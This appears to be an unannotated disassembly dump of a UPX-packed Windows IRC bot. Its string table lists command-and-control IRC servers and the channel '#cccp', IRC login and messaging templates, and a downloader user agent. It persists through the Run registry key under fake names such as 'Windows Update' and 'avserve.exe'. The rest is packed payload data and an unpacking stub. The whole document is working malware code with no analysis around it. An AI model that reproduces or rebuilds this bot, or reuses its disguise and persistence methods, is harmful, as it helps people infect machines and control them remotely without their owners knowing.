dd offset aFlanders_be_eu ; "flanders.be.eu.undernet.org"
dd offset aCaen_fr_eu_und ; "caen.fr.eu.undernet.org"
dd offset aBrussels_be_eu ; "brussels.be.eu.undernet.org"
dd offset aLosAngeles_ca_ ; "los-angeles.ca.us.undernet.org"
dd offset aWashington_dc_ ; "washington.dc.us.undernet.org"
dd offset aLondon_uk_eu_u ; "london.uk.eu.undernet.org"
dd offset aIrc_tsk_ru ; "irc.tsk.ru"
dd offset aLia_zanet_net ; "lia.zanet.net"
dd offset aGaspode_zanet_ ; "gaspode.zanet.org.za"
dd offset dword_31005BF0
dword_31005BF0 dd 2E637269h, 2E72616Bh, 74656EhaGaspode_zanet_ db 'gaspode.zanet.org.za',0 ; DATA XREF: UPX0:31005BE8�o
align 4
aLia_zanet_net db 'lia.zanet.net',0 ; DATA XREF: UPX0:31005BE4�o
align 4
aIrc_tsk_ru db 'irc.tsk.ru',0 ; DATA XREF: UPX0:31005BE0�o
align 10h
aLondon_uk_eu_u db 'london.uk.eu.undernet.org',0 ; DATA XREF: UPX0:31005BDC�o
align 4
aWashington_dc_ db 'washington.dc.us.undernet.org',0 ; DATA XREF: UPX0:31005BD8�o
align 4
aLosAngeles_ca_ db 'los-angeles.ca.us.undernet.org',0 ; DATA XREF: UPX0:31005BD4�o
align 4
aBrussels_be_eu db 'brussels.be.eu.undernet.org',0 ; DATA XREF: UPX0:31005BD0�o
aCaen_fr_eu_und db 'caen.fr.eu.undernet.org',0 ; DATA XREF: UPX0:31005BCC�o
aFlanders_be_eu db 'flanders.be.eu.undernet.org',0 ; DATA XREF: UPX0:31005BC8�o
aGraz_at_eu_und db 'graz.at.eu.undernet.org',0 ; DATA XREF: UPX0:31005BC4�o
aMoscowAdvokat_ db 'moscow-advokat.ru',0 ; DATA XREF: UPX0:off_31005BC0�o
align 4
aAbcdefghijkl_0 db 'abcdefghijklmnopqrstuvwxyz',0 ; DATA XREF: sub_31001D4B+1C�o
align 4
aAbcdefghijklmn db 'ABCDEFGHIJKLMNOPQRSTUVWXYZ',0 ; DATA XREF: sub_31001D4B+C�o
align 10h
aUserS8S db 'USER %s 8 * :%s',0Dh,0Ah,0 ; DATA XREF: sub_31001E80+1C4�o
align 4
aAlready db 'already',0 ; DATA XREF: sub_31001E80+133�o
aNickS db 'NICK %s',0Dh,0Ah,0 ; DATA XREF: sub_31001E80+D9�o
; sub_31001E80+165�o
align 4
aPassS db 'PASS %s',0Dh,0Ah,0 ; DATA XREF: sub_31001E80+9C�o
align 4
aPongS db 'PONG%s',0Dh,0Ah,0 ; DATA XREF: sub_310020C2+4F�o
align 10h
aPing db 'PING',0 ; DATA XREF: sub_310020C2+C�o
; sub_31002145:loc_310021E7�o
align 4
a451 db '451',0 ; DATA XREF: sub_31002145+8E�o
aJoinS db 'JOIN %s',0Dh,0Ah,0 ; DATA XREF: sub_31002145+16�o
align 4
aQuitS db 'QUIT %s',0Dh,0Ah,0 ; DATA XREF: sub_31002217+2C�o
align 4
aPrivmsgSS db 'PRIVMSG %s %s',0Dh,0Ah,0 ; DATA XREF: sub_3100238E+3B�o
aCccp db '#cccp',0 ; DATA XREF: sub_31002463+162�o
align 4
a12 db '12',0 ; DATA XREF: sub_31002463+58�o
align 10h
a_: ; DATA XREF: sub_31002463+4D�o
unicode 0, <_>,0
a_exe db '.exe',0 ; DATA XREF: sub_31002663+75�o
; sub_31003630+4B�o
align 4
asc_31005DCC: ; DATA XREF: sub_31002663+49�o
; sub_31003630+56�o
unicode 0, <\>,0
aMozilla4_0Comp db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0
; DATA XREF: sub_31002663+13�o
align 4
aJoin db 'JOIN',0 ; DATA XREF: sub_3100277D:loc_31002A6B�o
align 4
aQ: ; DATA XREF: sub_3100277D+2C3�o
unicode 0, <q>,0
aDD12SD db '%d,%d,12%s,%d',0 ; DATA XREF: sub_3100277D+29D�o
align 10h
aI: ; DATA XREF: sub_3100277D+253�o
unicode 0, <i>,0
asc_31005E24: ; DATA XREF: sub_3100277D+23A�o
unicode 0, <|>,0
aE: ; DATA XREF: sub_3100277D+146�o
unicode 0, <e>,0
a1D db '-1,%d',0 ; DATA XREF: sub_3100277D+78�o
align 4
aFtpupd_exe db 'ftpupd.exe',0 ; DATA XREF: UPX0:31002E06�o
align 10h
aUser32 db 'user32',0 ; DATA XREF: sub_31002E7C+A9�o
align 4
aMsvcrt db 'msvcrt',0 ; DATA XREF: sub_31002E7C+9B�o
align 10h
aWininet db 'wininet',0 ; DATA XREF: sub_31002E7C+94�o
aWs2_32 db 'ws2_32',0 ; DATA XREF: sub_31002E7C+87�o
align 10h
aU11 db 'u11',0 ; DATA XREF: sub_31002E7C+75�o
aU10 db 'u10',0 ; DATA XREF: sub_31002E7C+69�o
aU9 db 'u9',0 ; DATA XREF: sub_31002E7C+5D�o
align 4
aU8 db 'u8',0 ; DATA XREF: sub_31002E7C+51�o
align 10h
aU11x db 'u11x',0 ; DATA XREF: sub_31002E7C+45�o
align 4
aU10x db 'u10x',0 ; DATA XREF: sub_31002E7C+3B�o
align 10h
aU12x db 'u12x',0 ; DATA XREF: sub_31002E7C+22�o
align 4
asc_31005E88 db 0Dh,0Ah,0 ; DATA XREF: sub_31002FF1+124�o
align 4
aUseridUnix db ' : USERID : UNIX : ',0 ; DATA XREF: sub_31002FF1+104�o
aSoftwareMicros db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_31002C8E+23�o
; sub_31003589+58�o ...
align 10h
aWindowsUpdate db 'Windows Update',0 ; DATA XREF: sub_31002C8E+1C�o
; sub_31003630+87�o ...
align 10h
aSoftwareMicr_0 db 'Software\Microsoft\Wireless',0 ; DATA XREF: sub_310036FC+5A�o
; sub_310036FC+94�o
aClient db 'Client',0 ; DATA XREF: sub_310036FC+55�o
; sub_310036FC+8E�o
align 4
aAvserve2_exeup db 'avserve2.exeUpdate Service',0 ; DATA XREF: sub_31003589+47�o
align 10h
aAvserve_exe db 'avserve.exe',0 ; DATA XREF: sub_31003589+40�o
aWindowsUpdateS db 'Windows Update Service',0 ; DATA XREF: sub_31003589+39�o
align 4
aWinupdate db 'WinUpdate',0 ; DATA XREF: sub_31003589+32�o
align 10h
aSystray db 'SysTray',0 ; DATA XREF: sub_31003589+2B�o
aBotLoader db 'Bot Loader',0 ; DATA XREF: sub_31003589+24�o
align 4
aSystemRestoreS db 'System Restore Service',0 ; DATA XREF: sub_31003589+1D�o
align 4
aDiskDefragment db 'Disk Defragmenter',0 ; DATA XREF: sub_31003589+16�o
align 10h
aWindowsSecurit db 'Windows Security Manager',0 ; DATA XREF: sub_31003589+F�o
align 4
a1: ; DATA XREF: sub_310036FC+50�o
unicode 0, <1>,0
dd 6 dup(0)
dword_31005FC8 dd 0 ; sub_31002463+14B�w ...
dword_31005FCC dd 0 ; sub_3100277D+E8�r ...
dword_31005FD0 dd 8 dup(0) ; sub_3100277D+A�o
dword_31005FF0 dd 0 dword_31005FF4 dd 0 ; sub_31002C8E+80�w
dword_31005FF8 dd 0 ; sub_31002C40+25�o ...
dword_31005FFC dd 0 ; sub_31002C8E+75�w ...
UPX0 ends
; Section 2. (virtual address 00006000)
; Virtual size : 00003000 ( 12288.)
; Section size in file : 00003000 ( 12288.)
; Offset to raw data for section: 00006000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX1 segment para public 'CODE' use32
assume cs:UPX1
;org 31006000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_31006000 dd 68h ; UPX0:31002E26�w ...
dword_31006004 dd 0 ; sub_31002E7C+33�w
dword_31006008 dd 8 dup(0) dword_31006028 dd 0 ; sub_310032FD+69�r
dword_3100602C dd 31000000h ; UPX0:31002E0B�w
dword_31006030 dd 0 ; sub_310031AE+37�o ...
dword_31006034 dd 0 ; sub_310032FD+37�w ...
word_31006038 dw 0 ; DATA XREF: sub_3100314A+3B�r
; sub_310031AE:loc_3100320F�r ...
align 4
dword_3100603C dd 0 ; sub_310036FC+3C�w ...
dd 3F0h dup(0)
dd 0C4h, 40h, 72695601h, 6C617574h, 65657246h, 69560100h
dd 61757472h, 6C6C416Ch, 100636Fh, 4D746547h, 6C75646Fh
dd 6C694665h, 6D614E65h, 1004165h, 7274736Ch, 69706D63h
dd 43010041h, 4679706Fh, 41656C69h, 69570100h, 6578456Eh
dd 43010063h, 74616572h, 6F6F5465h, 6C65686Ch, 53323370h
dd 7370616Eh, 746F68h, 6F725001h, 73736563h, 69463233h
dd 747372h, 72655401h, 616E696Dh, 72506574h, 7365636Fh
dd 50010073h, 65636F72h, 32337373h, 7478654Eh, 65440100h
dd 6574656Ch, 656C6946h, 45010041h, 50746978h, 65636F72h
dd 1007373h, 46746547h, 53656C69h, 657A69h, 61655201h
dd 6C694664h, 49010065h, 7265746Eh, 6B636F6Ch, 6E496465h
dd 6D657263h, 746E65h, 65704F01h, 6576456Eh, 41746Eh, 65724301h
dd 50657461h, 65636F72h, 417373h, 65724301h, 4D657461h
dd 78657475h, 6C010041h, 63727473h, 41706Dh, 74654701h
dd 61636F4Ch, 6E49656Ch, 416F66h, 74736C01h, 74616372h
dd 6C010041h, 63727473h, 417970h, 74654701h, 7473614Ch
dd 6F727245h, 53010072h, 65747379h, 6D69546Dh, 466F5465h
dd 54656C69h, 656D69h, 74654701h, 74737953h, 69546D65h
dd 100656Dh, 736F6C43h, 6E614865h, 656C64h, 69725701h
dd 69466574h, 100656Ch, 61657243h, 69466574h, 41656Ch
dd 74736C01h, 79706372h, 100416Eh, 43746553h, 65727275h
dd 6944746Eh, 74636572h, 4179726Fh, 65470100h, 73795374h
dd 446D6574h, 63657269h, 79726F74h, 45010041h, 54746978h
dd 61657268h, 53010064h, 76457465h, 746E65h, 69615701h
dd 726F4674h, 676E6953h, 624F656Ch, 7463656Ah, 72430100h
dd 65746165h, 65726854h, 1006461h, 61657243h, 76456574h
dd 41746E65h, 736C0100h, 656C7274h, 100416Eh, 65656C53h
dd 47010070h, 75437465h, 6E657272h, 6F725074h, 73736563h
dd 65470100h, 6F725074h, 64644163h, 73736572h, 6F4C0100h
dd 694C6461h, 72617262h, 1004179h, 74697257h, 6F725065h
dd 73736563h, 6F6D654Dh, 1007972h, 6E65704Fh, 636F7250h
dd 737365h, 74654701h, 75646F4Dh, 6148656Ch, 656C646Eh
dd 47010041h, 69547465h, 6F436B63h, 746E75h, 0D100h, 0
dd 65520100h, 65724367h, 4B657461h, 78457965h, 52010041h
dd 65536765h, 6C615674h, 78456575h, 52010041h, 75516765h
dd 56797265h, 65756C61h, 417845h, 67655201h, 6E65704Fh
dd 4579654Bh, 1004178h, 44676552h, 74656C65h, 6C615665h
dd 416575h, 67655201h, 736F6C43h, 79654B65h, 62410100h
dd 5374726Fh, 65747379h, 7568536Dh, 776F6474h, 100416Eh
dd 70797243h, 65724374h, 48657461h, 687361h, 79724301h
dd 61487470h, 61446873h, 1006174h, 70797243h, 72655674h
dd 53796669h, 616E6769h, 65727574h, 43010041h, 74707972h
dd 74736544h, 48796F72h, 687361h, 79724301h, 65447470h
dd 6F727473h, 79654B79h, 72430100h, 52747079h, 61656C65h
dd 6F436573h, 7865746Eh, 43010074h, 74707972h, 75716341h
dd 43657269h, 65746E6Fh, 417478h, 79724301h, 6D497470h
dd 74726F70h, 79654Bh, 0DE00h, 0F800h, 74730100h, 79706372h
dd 74730100h, 74616372h, 655F0100h, 70656378h, 61685F74h
dd 656C646Eh, 1003372h, 696F7461h, 72730100h, 646E61h
dd 48455F01h, 6F72705Fh, 676F6Ch, 435F5F01h, 72467878h
dd 48656D61h, 6C646E61h, 1007265h, 73727473h, 1007274h
dd 63727473h, 1007268h, 6C727473h, 1006E65h, 736D656Dh
dd 1007465h, 636D656Dh, 1007970h, 646E6172h, 0E90000h
dd 1300000h, 77010000h, 69727073h, 4166746Eh, 65470100h
dd 726F4674h, 6F726765h, 57646E75h, 6F646E69h, 46010077h
dd 57646E69h, 6F646E69h, 1004177h, 57746547h, 6F646E69h
dd 72685477h, 50646165h, 65636F72h, 64497373h, 0F40000h
dd 1440000h, 49010000h, 7265746Eh, 4F74656Eh, 416E6570h
dd 6E490100h, 6E726574h, 65477465h, 6E6F4374h, 7463656Eh
dd 74536465h, 657461h, 746E4901h, 656E7265h, 65704F74h
dd 6C72556Eh, 49010041h, 7265746Eh, 5274656Eh, 46646165h
dd 656C69h, 10000h, 15800h, 8FF00h, 0FF0073FFh, 6FFF0039h
dd 0BFF00h, 0FF0034FFh, 0CFF0012h, 4FF00h, 0FF0016FFh
dd 9FF0017h, 2FF00h, 0FF000DFFh, 3FF0001h, 10FF00h, 13FFh
dd 0
dd 4550h, 2014Ch, 40C22F51h, 2 dup(0)
dd 10F00E0h, 6010Bh, 3200h, 1200h, 0
dd 2DFEh, 1000h, 5000h, 31000000h, 1000h, 200h, 4, 0
dd 4, 0
dd 7000h, 400h, 0
dd 2, 100000h, 1000h, 100000h, 1000h, 0
dd 10h, 2 dup(0)
dd 3920h, 8Ch, 14h dup(0)
dd 1000h, 1A4h, 6 dup(0)
dd 7865742Eh, 74h, 30C8h, 1000h, 3200h, 400h, 3 dup(0)
dd 0E0040020h, 7461642Eh, 61h, 1040h, 5000h, 1000h, 3600h
dd 3 dup(0)
dd 0C0000040h, 6000h, 3B50h, 651Ch, 68BD9C00h, 0B6296A50h
dd 0C3348250h, 0FFFFFFFFh, 8117F42h, 0B7B21C98h, 899D9CE7h
dd 971A3D77h, 5029A4D3h, 3A96A58Dh, 0E8FC8D46h, 10EB1612h
dd 0FFFFFFFFh, 457044AFh, 966AD0F8h, 439FB178h, 0A827EB51h
dd 8A397086h, 0C214DE09h, 7A53C1A1h, 85C4BF16h, 0FFFFFFFFh
dd 0E70F611Ah, 209E9829h, 0FE538966h, 94070CB1h, 75A3ECCAh
dd 0F91DA11Eh, 0CBC5B4E8h, 0F0DB1A4Eh, 0FFFFFFFFh, 873969D7h
dd 7B948C1Ah, 821318C6h, 4BBF3EB3h, 0EB67E042h, 0B7378400h
dd 0D8B3AA60h, 48022D7h, 0FFFFFFFCh, 4BA67A65h, 855886FFh
dd 0F96EF645h, 2FC956EEh, 3B4A3200h, 0D87AB7A6h, 6F63EBD3h
dd 0FFFF746Eh, 127882DFh, 0AAAAD536h, 0C9335DABh, 226B966h
dd 8B05758Dh, 0E8068AFEh, 3CDB6FFFh, 6460799h, 3446302Ch
dd 47078899h, 0AEBEDE2h, 0FFDBDAE8h, 2E31B7FEh, 2E676562h
dd 0C9999371h, 0BDFD1201h, 716FD91h, 0FDFDF6C1h, 0AA6872FFh
dd 0AA66FD42h, 14BA10FDh, 1A98F11Ch, 898F3C9h, 0EC760286h
dd 871EC7Fh, 0CB5F9010h, 96599237h, 180DBB1Ch, 0DB230375h
dd 89BDF6Bh, 251025CDh, 6FB1E4D5h, 47ECFB07h, 1B5D1854h
dd 0F3449FF3h, 19AE719Bh, 0FEC7FBBFh, 65E368F3h, 0B1C1C10h
dd 0FFD9751Ah, 24BD9D5Eh, 4DDC12FFh, 0CEFB10FFh, 0ADDB5BDh
dd 33AC4F07h, 0B29D0B00h, 98E51459h, 7FECF67Fh, 45123232h
dd 66CA89F3h, 6E71332Ch, 416713B3h, 0DB7D1A74h, 0D95DDF67h
dd 0F311348Ah, 8904F19Dh, 4FDBF109h, 2D04EEBAh, 67642EF3h
dd 76F0E3F3h, 0CBB264E4h, 0C9218266h, 4C9F2156h, 0E86FFDB6h
dd 9B2097C0h, 0C1D83F16h, 0EBDFECE5h, 0C98ED5B6h, 13BC919h
dd 0E90414D9h, 3F2C8C23h, 2871CA7Bh, 61688D63h, 0CDC3F591h
dd 0F42FEEDAh, 0CDA7ED66h, 0C96C5D12h, 64794ECBh, 56B2727Fh
dd 485A10F5h, 14C096A6h, 0C9FECB93h, 0A7294CE0h, 5D9CF3EBh
dd 0C9FF66FEh, 26F434F7h, 0F9C5D071h, 0ECEF133Bh, 470CABA8h
dd 1FFFFC8h, 0EDFFC5B7h, 0FDE9ECE9h, 0FCE1FCB7h, 0FFCAC999h
dd 0F5F0BFE5h, 0CFE9FCFCh, 0F7EBFCF2h, 0ABAAF5FCh, 0AAF934C7h
dd 2A2DB459h, 0FFFCBB3Fh, 0ACC91E66h, 0A5B7E7E6h, 0B8BD9CC9h
dd 9271829Dh, 3519BF30h, 0F7630751h, 951F148Dh, 2A91720Ah
dd 0D231C871h, 0FFDBFEA5h, 80D512FFh, 0AA529AE1h, 2A8D146Fh
dd 12B9C89Ah, 474A9A8Bh, 0AB9E5958h, 0A319DB9Bh, 0DE17FFEDh
dd 0A26CEC20h, 9EED85C1h, 81E8A2DFh, 125544EBh, 581FBDC8h
dd 96FFFE68h, 12EB8D2Eh, 5A9A85D8h, 9A099D12h, 2EF8105Ah
dd 0FDDB7B18h, 6649184Fh, 12FEFD7Fh, 0C25AA987h, 12850295h
dd 33FD0482h, 5A9176DAh, 0DECFF7CBh, 4D53FF85h, 17BF7242h
dd 1809FD52h, 0FE01C853h, 621700h, 0FFFFFE5Fh, 20435002h
dd 5754454Eh, 204B524Fh, 474F5250h, 204D4152h, 4C302E31h
dd 7D4D4E41h, 26B1FE9h, 6E69570Ah, 73776F64h, 20726F8Ch
dd 0B7DD6F57h, 676B03BFh, 70756F72h, 312E330Eh, 234D2761h
dd 0F9305832h, 30D876B7h, 16323232h, 20544E0Ah, 30204D4Ch
dd 5ACE7919h, 73A48B16h, 55BB7D07h, 0FF0C7E2Bh, 11040023h
dd 63002E0Ah, 5201483h, 6992D4h, 0D6FAA6F2h, 53534B4Ch
dd 97D20050h, 0E6E00882h, 5747B7FEh, 6E2400h, 6F0064h
dd 3A730077h, 0BDBD9174h, 90130D8h, 3500398Ch, 0B980D923h
dd 72E1D2Dh, 64ABDA00h, 8139E40h, 7657DA20h, 9F992702h
dd 466E0003h, 83203C23h, 4007470Dh, 97060006h, 108DCFFFh
dd 8A151F01h, 48E088h, 8144004Fh, 0FD811319h, 0F27A6AFFh
dd 281C49E4h, 742530AFh, 0E1536710h, 853CB05Ch, 3075DF7Ch
dd 0D75C0400h, 2F75CEBDh, 5C085A01h, 72E4D61h, 7236376Dh
dd 2E380036h, 491B3077h, 3B0EEC00h, 6443839Bh, 64633F00h
dd 7900F96Dh, 4DC08A2h, 0F6121640h, 0FFFF20h, 0E00DEDEh
dd 19F1600h, 0BF7D2602h, 28401309h, 8B110319h, 46F65D6Ch
dd 0D374D9C3h, 2A630070h, 14B6D99Ch, 9F256BF2h, 0AE480E10h
dd 4EC0EEBh, 5413541Bh, 0FF63265Ah, 59B6E7DCh, 0CBC75C22h
dd 5876545h, 30B00h, 109A41DAh, 110B848h, 0E93FFFF6h, 286A0181h
dd 0B10C3919h, 0A89B11D0h, 0D94FC000h, 0CB5FF52Eh, 5D3FF0BEh
dd 1CEB8A88h, 0E89F11C9h, 48102B3Ch, 3E4AD160h, 0F40CD917h
dd 0CA060A3h, 0F21E4019h, 0CB10CA0h, 9DFF7C00h, 880CA01Ch
dd 90040h, 703ECh, 93C23D83h, 4F401495h, 0BF40707Ch, 52F64400h
dd 13430764h, 7FE13CF2h, 138578h, 0E9A65BABh, 2FF81013h
dd 4E78C60h, 230EFEFFh, 1860E940h, 8408B224h, 0F2794388h
dd 10B93EE9h, 0B801FFEEh, 0F9200C10h, 0AD3C9B30h, 0F7F070Dh
dd 0F2CF92D8h, 7001180Ah, 0C8030F84h, 0F84BC87h, 2000F95h
dd 7E4F26C3h, 6C0F847Fh, 6F64000Fh, 0A89AC255h, 0F913436Fh
dd 23460427h, 50586E69h, 67725020h, 5840DBh, 3B014A46h
dd 0A1F92732h, 123C6B90h, 41027515h, 89AF6453h, 9E1C0090h
dd 95FFF301h, 0CC06EB53h, 73255C5Ch, 6370695Ch, 0FF2FF324h
dd 0EC81667Fh, 0E4FF071Ch, 44655300h, 67756265h, 6C697669h
dd 0DB656765h, 41FFF64Ch, 73756A64h, 6B6F5474h, 73176E65h
dd 0DF126F4Ch, 75724FEEh, 6C615670h, 17416575h, 6F28704Fh
dd 0B6C5FFC1h, 34732463h, 76646143h, 33697061h, 8FC1DFFFh
dd 657475EFh, 53FA6D72h, 6C6C6568h, 6172545Fh, 646E5779h
dd 37B7DBB9h, 61657243h, 6D65521Ah, 6854056Fh, 6DADDA0Ch
dd 695614DFh, 58757472h, 454F2841h, 0E06B0F78h, 724EDDACh
dd 0F447356Eh, 0A603DC7Ah, 0C0A69A69h, 4C6C8CA8h, 9A69B2CCh
dd 0FC142430h, 8DFFF05Bh, 634ADFDAh, 72616B2Eh, 67E2402Eh
dd 6F707361h, 0FE2E6564h, 7ADD12DCh, 0B52E0D61h, 6C530967h
dd 7FC36169h, 2513CDEEh, 7374330Fh, 71722E6Bh, 344DDBB5h
dd 2E6EE882h, 75650D75h, 62EB6105h, 3B8A0BAFh, 684F7727h
dd 5A1591CAh, 1F746777h, 1F2E3164h, 0FCADB765h, 2D736F6Ch
dd 1A65BA61h, 4C206163h, 6276856Dh, 731D2D60h, 5B6ECA45h
dd 652F5DCAh, 17726655h, 7BD813FCh, 0E616C66h, 61726733h
dd 74612E7Ah, 94DAA5C3h, 77E2876Dh, 0C2ED8E2Dh, 1E990573h
dd 63629BD6h, 0FED0BF21h, 0BF6766DBh, 6D6C6B6Ah, 71706F6Eh
dd 77767352h, 0D57A7978h, 0B912FFF2h, 44434241h, 48474645h
dd 4E4B4A49h, 0BEA0542Dh, 535251E8h, 5A96B354h, 0BF1BFB77h
dd 4553551Bh, 20422052h, 202A2038h, 0A0D073Ah, 0C4BA154Bh
dd 79B76CC3h, 314349E8h, 831B64F6h, 53DE5013h, 474E4F0Bh
dd 95F8970Ah, 7490B6Eh, 4A2B3534h, 0FC93C4Fh, 512F0C6Bh
dd 52544955h, 1DB75649h, 47315B7Bh, 63231166h, 62177000h
dd 3921E66Ch, 0A378E05Fh, 0BF8D0BA1h, 7A6F4D71h, 342F1388h
dd 0EDC2ED95h, 0E5282076h, 69E0706Dh, 203B7062h, 0E8434340h
dd 204549F6h, 203B1536h, 17CD80ABh, 7D3550BBh, 3F770029h
dd 0B83B2571h, 2C64DCD6h, 7685902h, 0CF8D03FBh, 607CA67Eh
dd 6613312Dh, 0FCF27074h, 64BC74A3h, 8973C775h, 6376736Dh
dd 68E6C7B7h, 695C03A5h, 5F325F35h, 7F74B758h, 31317517h
dd 0B393003h, 83220F38h, 7C18E7Ch, 0FBC23230h, 40E8F0B0h
dd 44494E20h, 46FE3C08h, 658DC97h, 79464F1Fh, 5C455241h
dd 0D83E694Dh, 0B75FD0B6h, 0BF5C7B6Fh, 7275435Ch
dd 17868DE9h, 56746E67h, 5C7269FDh, 0D7647552h, 0DCD876B5h
dd 9FF9A055h, 98F3153h, 27970D6Bh, 0D782723Fh, 0BD4B1AE0h
dd 0AF3FE843h, 0DCDBC476h, 657677B3h, 2037D132h, 65301053h
dd 0EC85961Bh, 235B1A25h, 0E61B74FAh, 796F6E17h, 4200CC73h
dd 5AD8E62Dh, 611B20BFh, 11B1375h, 6DD2B46Bh, 7E06D420h
dd 0D6DBB937h, 546944D2h, 2F666A20h, 0C2886D67h, 2AEC96DBh
dd 0DE632463h, 0B7797469h, 8D6B1106h, 8C1A1EDFh, 1101D4h
dd 159FB2C4h, 64013F27h, 65657246h, 7B7FF10Ch, 470D7145h
dd 6F4D7465h, 656C7564h, 0C56FFD46h, 614EE35Bh, 6C01E06Dh
dd 63727473h, 0DE69706Dh, 0ADEF702h, 79706F43h, 45BD0A19h
dd 0F8AD6578h, 0C632E158h, 6C6F6F54h, 0ED409BDFh, 323370FFh
dd 70616E53h, 746F6873h, 5A121419h, 325BBA81h, 540F7372h
dd 1EE3507h, 182CE60Bh, 78654E21h, 56B05B20h, 1DAC4488h
dd 0E8695D60h, 74B25CFEh, 53169728h, 52B27A69h, 0A57B6219h
dd 49090D72h, 0B688664Ah, 656BB8DDh, 88630A64h, 0D66C155Bh
dd 4590A06Dh, 9D410A76h, 4D02D970h, 934D0F96h, 0F2ECDA78h
dd 60417636h, 6C61474Ch, 196F6665h, 36B0F20Dh, 79702329h
dd 28847B61h, 72450DBFh, 0EA726F72h, 0FB6D6954h, 9EF62CB7h
dd 1823098Dh, 5C56BF6Eh, 48650820h, 7257ADB7h, 0B361BD97h
dd 0B86DD69h, 33886E61h, 530A75A2h, 2544EB3Eh, 0BAD88D7Bh
dd 54784463h, 8187419Bh, 36361F14h, 0D8BA5B68h, 466163F0h
dd 0CC365320h, 5B9C15BDh, 2E6A624Fh, 0B0DA2C6Dh, 2F0D1B37h
dd 166129DEh, 67BC5BBh, 826C7065h, 7FB1117Dh, 64410B09h
dd 0D0F7264h, 0EDDF7B36h, 7262694Ch, 2BD68861h, 9B0314Dh
dd 829DA3AEh, 4D98503Eh, 0D0085498h, 629A891Fh, 754EB5A3h
dd 9DA8D194h, 0D830D09Fh, 654B9F67h, 0EC3B4579h, 0DA10CE44h
dd 0A510F69h, 5AC25EC0h, 306B1160h, 466C5987h, 83102144h
dd 7B76841Ch, 62410C51h, 6853499Ch, 68A57B7Bh, 72F77D02h
dd 77747079h, 368D60BEh, 0A10B9A0h, 315DC244h, 0E6112DBh
dd 7966697Ah, 5AC36856h, 75BF67C7h, 0EC6C362Bh, 3E6DEC2Dh
dd 112C796Fh, 0AD1E106Fh, 8F52EE6Dh, 0EAEB651Eh, 0F21B0EE4h
dd 634114CFh, 72697571h, 0B34494Dh, 0A08A35CEh, 0F8DE133Ah
dd 0E336775Ah, 3E61071Bh, 740A2F5Fh, 2A5515B8h, 904B685Fh
dd 0D6EEB9DEh, 696F1511h, 1E10721Fh, 705F4845h, 0D6DDE953h
dd 0B67F27Fh, 7878435Fh, 733BC5E5h, 2C4859B1h, 684D0245h
dd 0CADB6C07h, 226E1736h, 774A26Dh, 58BDB366h, 0E9844C6Dh
dd 263A0130h, 7377DB6Ch, 66AA6953h, 0C5655FBAh, 0F502668Ah
dd 6CD9C222h, 0C814A358h, 0D30B210Bh, 708CC60Dh, 0F44F4906h
dd 4E9D1307h, 0BAA3B744h, 0B2DC1A39h, 11390E41h, 85DAB36Eh
dd 53CF2E19h, 55298F74h, 564B9BABh, 4F052CC0h, 65965803h
dd 8FF36D9h, 6F397302h, 6596590Bh, 0C123459h, 59651604h
dd 9176596h, 50010D02h, 39658CFh, 507A1310h, 0DF20F45h
dd 5173DFA0h, 0E040C22Fh, 67AA0F00h, 0B01F6CDh, 320C0601h
dd 2DFE1312h, 0E7B1B1AAh, 310E30AAh, 0E92D020Bh, 727C966h
dd 0D92700Ch, 341ECCECh, 84060710h, 3C72D55h, 7F8C3920h
dd 2ED8571h, 1E01A464h, 0D82F662Eh, 0C8077EEEh, 0B7EB9030h
dd 0CB6F4ED9h, 2EE0109Bh, 40FB0A64h, 0DF6176Fh, 40273607h
dd 6000C01Eh, 34B0C000h, 961C3Bh, 0
dd 0FF900000h, 6000BE60h, 0BE8D3100h, 0FFFFB000h, 0FFCD8357h
dd 909010EBh, 90909090h, 8846068Ah, 0DB014707h, 1E8B0775h
dd 11FCEE83h, 0B8ED72DBh, 1, 775DB01h, 0EE831E8Bh, 11DB11FCh
dd 73DB01C0h, 8B0975EFh, 0FCEE831Eh, 0E473DB11h, 0E883C931h
dd 0C10D7203h, 68A08E0h, 0FFF08346h, 0C5897474h, 775DB01h
dd 0EE831E8Bh, 11DB11FCh, 75DB01C9h, 831E8B07h, 0DB11FCEEh
dd 2075C911h, 75DB0141h, 831E8B07h, 0DB11FCEEh, 0DB01C911h
dd 975EF73h, 0EE831E8Bh, 73DB11FCh, 2C183E4h, 0F300FD81h
dd 0D183FFFFh, 2F148D01h, 76FCFD83h, 42028A0Fh, 49470788h
dd 63E9F775h, 90FFFFFFh, 0C283028Bh, 83078904h, 0E98304C7h
dd 1F17704h, 0FF4CE9CFh, 895EFFFFh, 0B7B9F7h, 78A0000h
dd 3CE82C47h, 80F77701h, 0F275013Fh, 5F8A078Bh, 0E8C16604h
dd 10C0C108h, 0F829C486h, 1E8EB80h, 830789F0h, 0D88905C7h
dd 0BE8DD9E2h, 6000h, 0C009078Bh, 5F8B4574h, 30848D04h
dd 8000h, 8350F301h, 96FF08C7h, 808Ch, 47078A95h, 0DC74C008h
dd 779F989h, 4707B70Fh, 57B94750h, 55AEF248h, 809096FFh
dd 0C0090000h, 3890774h, 0EB04C383h, 9496FFD8h, 61000080h
dd 0FFAA81E9h, 0FFh, 320h dup(0)
UPX1 ends
; Section 3. (virtual address 00009000)
; Virtual size : 00002000 ( 8192.)
; Section size in file : 00002000 ( 8192.)
; Offset to raw data for section: 00009000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX2 segment para public 'CODE' use32
assume cs:UPX2
;org 31009000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dd 3 dup(0)
dd 90C4h, 908Ch, 3 dup(0)
dd 90D1h, 909Ch, 3 dup(0)
dd 90DEh, 90A4h, 3 dup(0)
dd 90E9h, 90ACh, 3 dup(0)
dd 90F4h, 90B4h, 3 dup(0)
dd 9100h, 90BCh, 5 dup(0)
dd 7C801D77h, 7C80ADA0h, 7C81CDDAh, 0
dd 77DD6BF0h, 0
dd 77C1BF18h, 0
dd 7E41A8ADh, 0
dd 42C2C8A1h, 0
dd 71AB428Ah, 0
dd 4E52454Bh, 32334C45h, 4C4C442Eh, 56444100h, 33495041h
dd 6C642E32h, 534D006Ch, 54524356h, 6C6C642Eh, 45535500h
